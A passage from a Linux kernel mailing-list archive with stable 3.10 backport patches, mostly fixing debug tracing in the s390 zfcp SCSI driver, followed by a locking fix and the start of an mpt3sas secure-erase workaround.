@@ -49,6 +49,7 @@ extern void zfcp_dbf_adapter_unregister(struct zfcp_adapter *);
 extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *,
 			      struct zfcp_port *, struct scsi_device *, u8, u8);
 extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *);
+extern void zfcp_dbf_rec_run_wka(char *, struct zfcp_fc_wka_port *, u64);
 extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *);
diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8e0979c..8898139 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -1605,7 +1605,7 @@ out:
 int zfcp_fsf_open_wka_port(struct zfcp_fc_wka_port *wka_port)
 {
 	struct zfcp_qdio *qdio = wka_port->adapter->qdio;
-	struct zfcp_fsf_req *req;
+	struct zfcp_fsf_req *req = NULL;
 	int retval = -EIO;
 
 	spin_lock_irq(&qdio->req_q_lock);
@@ -1634,6 +1634,8 @@ int zfcp_fsf_open_wka_port(struct zfcp_fc_wka_port *wka_port)
 		zfcp_fsf_req_free(req);
 out:
 	spin_unlock_irq(&qdio->req_q_lock);
+	if (req && !IS_ERR(req))
+		zfcp_dbf_rec_run_wka("fsowp_1", wka_port, req->req_id);
 	return retval;
 }
 
@@ -1658,7 +1660,7 @@ static void zfcp_fsf_close_wka_port_handler(struct zfcp_fsf_req *req)
 int zfcp_fsf_close_wka_port(struct zfcp_fc_wka_port *wka_port)
 {
 	struct zfcp_qdio *qdio = wka_port->adapter->qdio;
-	struct zfcp_fsf_req *req;
+	struct zfcp_fsf_req *req = NULL;
 	int retval = -EIO;
 
 	spin_lock_irq(&qdio->req_q_lock);
@@ -1687,6 +1689,8 @@ int zfcp_fsf_close_wka_port(struct zfcp_fc_wka_port *wka_port)
 		zfcp_fsf_req_free(req);
 out:
 	spin_unlock_irq(&qdio->req_q_lock);
+	if (req && !IS_ERR(req))
+		zfcp_dbf_rec_run_wka("fscwp_1", wka_port, req->req_id);
 	return retval;
 }
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 136/319] zfcp: restore tracing of handle for port and LUN with HBA records
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 7c964ffe586bc0c3d9febe9bf97a2e4b2866e5b7 upstream.

This information was lost with
commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
but is required to debug e.g. invalid handle situations.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 2 ++
 drivers/s390/scsi/zfcp_dbf.h | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index e99b3d6..1abe57d 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -78,6 +78,8 @@ void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req)
 	rec->u.res.req_issued = req->issued;
 	rec->u.res.prot_status = q_pref->prot_status;
 	rec->u.res.fsf_status = q_head->fsf_status;
+	rec->u.res.port_handle = q_head->port_handle;
+	rec->u.res.lun_handle = q_head->lun_handle;
 
 	memcpy(rec->u.res.prot_status_qual, &q_pref->prot_status_qual,
 	       FSF_PROT_STATUS_QUAL_SIZE);
diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index 97f46e6..ac7bce8 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -131,6 +131,8 @@ struct zfcp_dbf_hba_res {
 	u8  prot_status_qual[FSF_PROT_STATUS_QUAL_SIZE];
 	u32 fsf_status;
 	u8  fsf_status_qual[FSF_STATUS_QUALIFIER_SIZE];
+	u32 port_handle;
+	u32 lun_handle;
 } __packed;
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 771bf03537ddfa4a4dde62ef9dfbc82e4f77ab20 upstream.

With commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
we lost the N_Port-ID where an ELS response comes from.
With commit 7c7dc196814b9e1d5cc254dc579a5fa78ae524f7
("[SCSI] zfcp: Simplify handling of ct and els requests")
we lost the N_Port-ID where a CT response comes from.
It's especially useful if the request SAN trace record
with D_ID was already lost due to trace buffer wrap.

GS uses an open WKA port handle and ELS just a D_ID, and
only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req.
To cover both cases, add a new field to zfcp_fsf_ct_els
and fill it in on request to use in SAN response trace.
Strictly speaking the D_ID on SAN response is the FC frame's S_ID.
We don't need a field for the other end which is always us.
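
The approach can be sketched in a few lines of standalone C. The
types and helpers below (struct ct_els_req, struct san_trace,
send_request(), trace_response()) are hypothetical and only model the
data flow, not the zfcp structures:

```c
#include <stdint.h>

/* Hypothetical request context shared by the CT and ELS paths. */
struct ct_els_req {
	uint32_t d_id;	/* remembered at request time */
};

/* Hypothetical response trace record. */
struct san_trace {
	uint32_t d_id;
};

/* On request: remember the destination, whatever its origin was. */
static void send_request(struct ct_els_req *req, uint32_t d_id)
{
	req->d_id = d_id;
}

/* On response: reuse the remembered value instead of tracing 0. */
static void trace_response(struct san_trace *rec,
			   const struct ct_els_req *req)
{
	rec->d_id = req->d_id;
}
```

Storing the value in the shared request context covers both cases
with one field, since the response path does not need to know whether
the D_ID came from a WKA port or from the ELS caller.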

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Fixes: 7c7dc196814b ("[SCSI] zfcp: Simplify handling of ct and els requests")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 2 +-
 drivers/s390/scsi/zfcp_fsf.c | 2 ++
 drivers/s390/scsi/zfcp_fsf.h | 4 +++-
 3 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 1abe57d..a940602 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -400,7 +400,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
 
 	length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
 	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
-		     fsf->req_id, 0);
+		     fsf->req_id, ct_els->d_id);
 }
 
 /**
diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8898139..f246097 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -1085,6 +1085,7 @@ int zfcp_fsf_send_ct(struct zfcp_fc_wka_port *wka_port,
 
 	req->handler = zfcp_fsf_send_ct_handler;
 	req->qtcb->header.port_handle = wka_port->handle;
+	ct->d_id = wka_port->d_id;
 	req->data = ct;
 
 	zfcp_dbf_san_req("fssct_1", req, wka_port->d_id);
@@ -1188,6 +1189,7 @@ int zfcp_fsf_send_els(struct zfcp_adapter *adapter, u32 d_id,
 
 	hton24(req->qtcb->bottom.support.d_id, d_id);
 	req->handler = zfcp_fsf_send_els_handler;
+	els->d_id = d_id;
 	req->data = els;
 
 	zfcp_dbf_san_req("fssels1", req, d_id);
diff --git a/drivers/s390/scsi/zfcp_fsf.h b/drivers/s390/scsi/zfcp_fsf.h
index 5e795b8..8cad41f 100644
--- a/drivers/s390/scsi/zfcp_fsf.h
+++ b/drivers/s390/scsi/zfcp_fsf.h
@@ -3,7 +3,7 @@
  *
  * Interface to the FSF support functions.
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #ifndef FSF_H
@@ -462,6 +462,7 @@ struct zfcp_blk_drv_data {
  * @handler_data: data passed to handler function
  * @port: Optional pointer to port for zfcp internal ELS (only test link ADISC)
  * @status: used to pass error status to calling function
+ * @d_id: Destination ID of either open WKA port for CT or of D_ID for ELS
  */
 struct zfcp_fsf_ct_els {
 	struct scatterlist *req;
@@ -470,6 +471,7 @@ struct zfcp_fsf_ct_els {
 	void *handler_data;
 	struct zfcp_port *port;
 	int status;
+	u32 d_id;
 };
 
 #endif				/* FSF_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (36 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels) Willy Tarreau
                   ` (180 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 94db3725f049ead24c96226df4a4fb375b880a77 upstream.

commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
started to add FC_CT_HDR_LEN which made zfcp dump random data
out of bounds for RSPN GS responses because u.rspn.rsp
is the largest and last field in the union of struct zfcp_fc_req.
Other request/response types only happened to stay within bounds
due to the padding of the union or
due to the trace capping of u.gspn.rsp to ZFCP_DBF_SAN_MAX_PAYLOAD.

Timestamp      : ...
Area           : SAN
Subarea        : 00
Level          : 1
Exception      : -
CPU id         : ..
Caller         : ...
Record id      : 2
Tag            : fsscth2
Request id     : 0x...
Destination ID : 0x00fffffc
Payload short  : 01000000 fc020000 80020000 00000000
                 xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx <===
                 00000000 00000000 00000000 00000000
Payload length : 32                                  <===

struct zfcp_fc_req {
    [0] struct zfcp_fsf_ct_els ct_els;
   [56] struct scatterlist sg_req;
   [96] struct scatterlist sg_rsp;
        union {
            struct {req; rsp;} adisc;    SIZE: 28+28=   56
            struct {req; rsp;} gid_pn;   SIZE: 24+20=   44
            struct {rspsg; req;} gpn_ft; SIZE: 40*4+20=180
            struct {req; rsp;} gspn;     SIZE: 20+273= 293
            struct {req; rsp;} rspn;     SIZE: 277+16= 293
  [136] } u;
}
SIZE: 432
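
The overrun for RSPN can be checked with a little arithmetic. What follows is a minimal user-space sketch, not driver code. The member sizes are taken from the layout listing above. The 16-byte CT header length is an assumption inferred from the trace (payload length 32 for a 16-byte RSPN response). All identifiers are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* Sizes from the struct zfcp_fc_req listing above (rspn member). */
enum {
	RSPN_REQ_SIZE = 277,	/* u.rspn.req */
	RSPN_RSP_SIZE = 16,	/* u.rspn.rsp, last field of the union */
	UNION_SIZE    = 293,	/* size of the largest union member */
	CT_HDR_LEN    = 16,	/* assumed value of FC_CT_HDR_LEN */
};

/* Length traced before the fix: scatterlist length plus CT header. */
static size_t trace_len_old(size_t sg_len)
{
	return sg_len + CT_HDR_LEN;
}

/* Length traced after the fix: the scatterlist length alone. */
static size_t trace_len_new(size_t sg_len)
{
	return sg_len;
}

/* True if tracing `len` bytes of u.rspn.rsp reads past the union. */
static bool rspn_rsp_overruns(size_t len)
{
	return RSPN_REQ_SIZE + len > UNION_SIZE;
}
```

With these numbers the old length runs 16 bytes past the end of the union, while the new length ends exactly at its boundary.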

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index a940602..90ffe7b 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -382,7 +382,7 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->req->length + FC_CT_HDR_LEN);
+	length = (u16)(ct_els->req->length);
 	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length,
 		     fsf->req_id, d_id);
 }
@@ -398,7 +398,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
+	length = (u16)(ct_els->resp->length);
 	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
 		     fsf->req_id, ct_els->d_id);
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels)
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (37 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable Willy Tarreau
                   ` (179 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit aceeffbb59bb91404a0bda32a542d7ebf878433a upstream.

This was lost with commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
but is necessary for problem determination, e.g. to see the
currently active zone set during automatic port scan.

For the large GPN_FT response (4 pages), save space by not dumping
any empty residual entries.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 116 ++++++++++++++++++++++++++++++++++++++-----
 drivers/s390/scsi/zfcp_dbf.h |   1 +
 2 files changed, 104 insertions(+), 13 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 90ffe7b..d45071c 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -3,7 +3,7 @@
  *
  * Debug traces for zfcp.
  *
- * Copyright IBM Corp. 2002, 2015
+ * Copyright IBM Corp. 2002, 2016
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -349,12 +349,15 @@ void zfcp_dbf_rec_run_wka(char *tag, struct zfcp_fc_wka_port *wka_port,
 }
 
 static inline
-void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len,
-		  u64 req_id, u32 d_id)
+void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf,
+		  char *paytag, struct scatterlist *sg, u8 id, u16 len,
+		  u64 req_id, u32 d_id, u16 cap_len)
 {
 	struct zfcp_dbf_san *rec = &dbf->san_buf;
 	u16 rec_len;
 	unsigned long flags;
+	struct zfcp_dbf_pay *payload = &dbf->pay_buf;
+	u16 pay_sum = 0;
 
 	spin_lock_irqsave(&dbf->san_lock, flags);
 	memset(rec, 0, sizeof(*rec));
@@ -362,10 +365,41 @@ void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len,
 	rec->id = id;
 	rec->fsf_req_id = req_id;
 	rec->d_id = d_id;
-	rec_len = min(len, (u16)ZFCP_DBF_SAN_MAX_PAYLOAD);
-	memcpy(rec->payload, data, rec_len);
 	memcpy(rec->tag, tag, ZFCP_DBF_TAG_LEN);
+	rec->pl_len = len; /* full length even if we cap pay below */
+	if (!sg)
+		goto out;
+	rec_len = min_t(unsigned int, sg->length, ZFCP_DBF_SAN_MAX_PAYLOAD);
+	memcpy(rec->payload, sg_virt(sg), rec_len); /* part of 1st sg entry */
+	if (len <= rec_len)
+		goto out; /* skip pay record if full content in rec->payload */
+
+	/* if (len > rec_len):
+	 * dump data up to cap_len ignoring small duplicate in rec->payload
+	 */
+	spin_lock_irqsave(&dbf->pay_lock, flags);
+	memset(payload, 0, sizeof(*payload));
+	memcpy(payload->area, paytag, ZFCP_DBF_TAG_LEN);
+	payload->fsf_req_id = req_id;
+	payload->counter = 0;
+	for (; sg && pay_sum < cap_len; sg = sg_next(sg)) {
+		u16 pay_len, offset = 0;
+
+		while (offset < sg->length && pay_sum < cap_len) {
+			pay_len = min((u16)ZFCP_DBF_PAY_MAX_REC,
+				      (u16)(sg->length - offset));
+			/* cap_len <= pay_sum < cap_len+ZFCP_DBF_PAY_MAX_REC */
+			memcpy(payload->data, sg_virt(sg) + offset, pay_len);
+			debug_event(dbf->pay, 1, payload,
+				    zfcp_dbf_plen(pay_len));
+			payload->counter++;
+			offset += pay_len;
+			pay_sum += pay_len;
+		}
+	}
+	spin_unlock(&dbf->pay_lock);
 
+out:
 	debug_event(dbf->san, 1, rec, sizeof(*rec));
 	spin_unlock_irqrestore(&dbf->san_lock, flags);
 }
@@ -382,9 +416,62 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->req->length);
-	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length,
-		     fsf->req_id, d_id);
+	length = (u16)zfcp_qdio_real_bytes(ct_els->req);
+	zfcp_dbf_san(tag, dbf, "san_req", ct_els->req, ZFCP_DBF_SAN_REQ,
+		     length, fsf->req_id, d_id, length);
+}
+
+static u16 zfcp_dbf_san_res_cap_len_if_gpn_ft(char *tag,
+					      struct zfcp_fsf_req *fsf,
+					      u16 len)
+{
+	struct zfcp_fsf_ct_els *ct_els = fsf->data;
+	struct fc_ct_hdr *reqh = sg_virt(ct_els->req);
+	struct fc_ns_gid_ft *reqn = (struct fc_ns_gid_ft *)(reqh + 1);
+	struct scatterlist *resp_entry = ct_els->resp;
+	struct fc_gpn_ft_resp *acc;
+	int max_entries, x, last = 0;
+
+	if (!(memcmp(tag, "fsscth2", 7) == 0
+	      && ct_els->d_id == FC_FID_DIR_SERV
+	      && reqh->ct_rev == FC_CT_REV
+	      && reqh->ct_in_id[0] == 0
+	      && reqh->ct_in_id[1] == 0
+	      && reqh->ct_in_id[2] == 0
+	      && reqh->ct_fs_type == FC_FST_DIR
+	      && reqh->ct_fs_subtype == FC_NS_SUBTYPE
+	      && reqh->ct_options == 0
+	      && reqh->_ct_resvd1 == 0
+	      && reqh->ct_cmd == FC_NS_GPN_FT
+	      /* reqh->ct_mr_size can vary so do not match but read below */
+	      && reqh->_ct_resvd2 == 0
+	      && reqh->ct_reason == 0
+	      && reqh->ct_explan == 0
+	      && reqh->ct_vendor == 0
+	      && reqn->fn_resvd == 0
+	      && reqn->fn_domain_id_scope == 0
+	      && reqn->fn_area_id_scope == 0
+	      && reqn->fn_fc4_type == FC_TYPE_FCP))
+		return len; /* not GPN_FT response so do not cap */
+
+	acc = sg_virt(resp_entry);
+	max_entries = (reqh->ct_mr_size * 4 / sizeof(struct fc_gpn_ft_resp))
+		+ 1 /* zfcp_fc_scan_ports: bytes correct, entries off-by-one
+		     * to account for header as 1st pseudo "entry" */;
+
+	/* the basic CT_IU preamble is the same size as one entry in the GPN_FT
+	 * response, allowing us to skip special handling for it - just skip it
+	 */
+	for (x = 1; x < max_entries && !last; x++) {
+		if (x % (ZFCP_FC_GPN_FT_ENT_PAGE + 1))
+			acc++;
+		else
+			acc = sg_virt(++resp_entry);
+
+		last = acc->fp_flags & FC_NS_FID_LAST;
+	}
+	len = min(len, (u16)(x * sizeof(struct fc_gpn_ft_resp)));
+	return len; /* cap after last entry */
 }
 
 /**
@@ -398,9 +485,10 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->resp->length);
-	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
-		     fsf->req_id, ct_els->d_id);
+	length = (u16)zfcp_qdio_real_bytes(ct_els->resp);
+	zfcp_dbf_san(tag, dbf, "san_res", ct_els->resp, ZFCP_DBF_SAN_RES,
+		     length, fsf->req_id, ct_els->d_id,
+		     zfcp_dbf_san_res_cap_len_if_gpn_ft(tag, fsf, length));
 }
 
 /**
@@ -414,11 +502,13 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf)
 	struct fsf_status_read_buffer *srb =
 		(struct fsf_status_read_buffer *) fsf->data;
 	u16 length;
+	struct scatterlist sg;
 
 	length = (u16)(srb->length -
 			offsetof(struct fsf_status_read_buffer, payload));
-	zfcp_dbf_san(tag, dbf, srb->payload.data, ZFCP_DBF_SAN_ELS, length,
-		     fsf->req_id, ntoh24(srb->d_id));
+	sg_init_one(&sg, srb->payload.data, length);
+	zfcp_dbf_san(tag, dbf, "san_els", &sg, ZFCP_DBF_SAN_ELS, length,
+		     fsf->req_id, ntoh24(srb->d_id), length);
 }
 
 /**
diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index ac7bce8..440aa61 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -115,6 +115,7 @@ struct zfcp_dbf_san {
 	u32 d_id;
 #define ZFCP_DBF_SAN_MAX_PAYLOAD (FC_CT_HDR_LEN + 32)
 	char payload[ZFCP_DBF_SAN_MAX_PAYLOAD];
+	u16 pl_len;
 } __packed;
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (38 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels) Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
                   ` (178 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit e7cb08e894a0b876443ef8fdb0706575dc00a5d2 upstream.

We accidentally overwrite the original saved value of "flags" so that we
can't re-enable IRQs at the end of the function.  Presumably this
function is mostly called with IRQs disabled or it would be obvious in
testing.
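
The effect of reusing "flags" can be modelled in user space. This is only a sketch under stated assumptions: a single boolean stands in for the CPU interrupt state, the helper names are hypothetical, and the helpers return the saved state instead of assigning it through a macro argument as the kernel's spin_lock_irqsave() does.

```c
#include <stdbool.h>

/* Stand-in for the CPU interrupt-enable state (hypothetical model). */
static bool irqs_enabled = true;

/* Models the "irqsave" half: remember the current state, then disable. */
static unsigned long model_irq_save(void)
{
	unsigned long flags = irqs_enabled ? 1UL : 0UL;

	irqs_enabled = false;
	return flags;
}

/* Models the "irqrestore" half: put back whatever state was saved. */
static void model_irq_restore(unsigned long flags)
{
	irqs_enabled = (flags != 0);
}

/* Before the fix: the inner lock reuses `flags`. */
static bool irqs_on_after_nested_irqsave(void)
{
	unsigned long flags;

	irqs_enabled = true;
	flags = model_irq_save();	/* outer lock: saves "enabled" */
	flags = model_irq_save();	/* inner lock: overwrites it with "disabled" */
	/* inner plain unlock: leaves the IRQ state alone */
	model_irq_restore(flags);	/* outer unlock: restores "disabled" */
	return irqs_enabled;
}

/* After the fix: the inner lock is a plain lock and leaves `flags` alone. */
static bool irqs_on_after_plain_inner_lock(void)
{
	unsigned long flags;

	irqs_enabled = true;
	flags = model_irq_save();	/* outer lock: saves "enabled" */
	/* inner plain lock and unlock: no effect on the IRQ state or on flags */
	model_irq_restore(flags);	/* outer unlock: restores "enabled" */
	return irqs_enabled;
}
```

In the model, a caller that enters with IRQs enabled leaves with them disabled in the first variant and enabled in the second. A caller that enters with IRQs already disabled sees no difference, which fits the remark about testing above.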

Fixes: aceeffbb59bb ("zfcp: trace full payload of all SAN records (req,resp,iels)")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index d45071c..c846a63 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -377,7 +377,7 @@ void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf,
 	/* if (len > rec_len):
 	 * dump data up to cap_len ignoring small duplicate in rec->payload
 	 */
-	spin_lock_irqsave(&dbf->pay_lock, flags);
+	spin_lock(&dbf->pay_lock);
 	memset(payload, 0, sizeof(*payload));
 	memcpy(payload->area, paytag, ZFCP_DBF_TAG_LEN);
 	payload->fsf_req_id = req_id;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (39 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-06 16:21   ` Sathya Prakash Veerichetty
  2017-02-05 19:19 ` [PATCH 3.10 142/319] mpt2sas: " Willy Tarreau
                   ` (177 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Grodzovsky, linux-scsi, Sathya Prakash, Chaitra P B,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen, Willy Tarreau

From: Andrey Grodzovsky <andrey2805@gmail.com>

commit 18f6084a989ba1b38702f9af37a2e4049a924be6 upstream.

This is a workaround for a bug with LSI Fusion MPT SAS2 when performing
secure erase. Due to the very long time the operation takes, commands
issued during the erase will time out and will trigger execution of the
abort hook. Even though the abort hook is called only for the specific
command which timed out, this leads to a halt of the entire device
(scsi_state terminated) and premature termination of the secure erase.

Set device state to busy while ATA passthrough commands are in progress.

[mkp: hand applied to 4.9/scsi-fixes, tweaked patch description]

